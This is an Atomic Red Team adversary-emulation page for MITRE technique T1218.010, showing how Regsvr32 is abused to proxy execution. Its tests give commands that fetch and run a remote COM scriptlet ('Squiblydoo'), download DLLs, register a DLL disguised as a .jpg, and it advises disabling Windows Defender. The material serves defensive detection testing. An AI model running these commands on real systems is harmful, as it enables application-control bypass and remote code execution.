# T1218.010 - Regsvr32
Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)

Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)

Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)

## Atomic Tests

### Atomic Test #1 - Regsvr32 local COM scriptlet execution
Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Regsvr32.sct must exist on disk at specified location (#{filename})

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\T1218.010\src\RegSvr32.sct") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1218.010\src\RegSvr32.sct") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/src/RegSvr32.sct" -OutFile "PathToAtomicsFolder\T1218.010\src\RegSvr32.sct"

```

In [ ]:
Invoke-AtomicTest T1218.010 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
C:\Windows\system32\regsvr32.exe /s /u /i:"PathToAtomicsFolder\T1218.010\src\RegSvr32.sct" scrobj.dll
```

In [ ]:
Invoke-AtomicTest T1218.010 -TestNumbers 1

### Atomic Test #2 - Regsvr32 remote COM scriptlet executionRegsvr32.exe is a command-line program used to register and unregister OLE controls. This test may be blocked by windows defender; disable
windows defender real-time protection to fix it. Upon execution, calc.exe will be launched.
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
C:\Windows\system32\regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll
```

In [ ]:
Invoke-AtomicTest T1218.010 -TestNumbers 2

### Atomic Test #3 - Regsvr32 local DLL execution
Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: AllTheThingsx86.dll must exist on disk at specified location (#{dll_name})

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll"

```

In [ ]:
Invoke-AtomicTest T1218.010 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll) ELSE ( C:\Windows\system32\regsvr32.exe /s PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll )
```

In [ ]:
Invoke-AtomicTest T1218.010 -TestNumbers 3

### Atomic Test #4 - Regsvr32 Registering Non DLL
Replicating observed Gozi maldoc behavior registering a dll with an altered extension

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `command_prompt`!
##### Description: Test requires a renamed dll file

##### Check Prereq Commands:
```cmd
if exist %temp%\shell32.jpg ( exit 0 ) else ( exit 1 )

```
##### Get Prereq Commands:
```cmd
copy "C:\Windows\System32\shell32.dll" "%temp%\shell32.jpg"

```

In [ ]:
Invoke-AtomicTest T1218.010 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
C:\Windows\system32\regsvr32.exe /s %temp%\shell32.jpg
```

In [ ]:
Invoke-AtomicTest T1218.010 -TestNumbers 4

#### Cleanup: 
```cmd
C:\Windows\system32\regsvr32.exe /U /s %temp%\shell32.jpg
```

In [ ]:
Invoke-AtomicTest T1218.010 -TestNumbers 4 -Cleanup

### Atomic Test #5 - Regsvr32 Silent DLL Install Call DllRegisterServer
Regsvr32.exe is a command-line program used to register and unregister OLE controls. Normally, an install is executed with /n to prevent calling DllRegisterServer.
**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: AllTheThingsx86.dll must exist on disk at specified location (#{dll_name})
##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll"
```

In [ ]:
Invoke-AtomicTest T1218.010 -TestNumbers 5 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
C:\Windows\system32\regsvr32.exe /s /i "PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll"
```

In [ ]:
Invoke-AtomicTest T1218.010 -TestNumbers 5

## Detection
Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)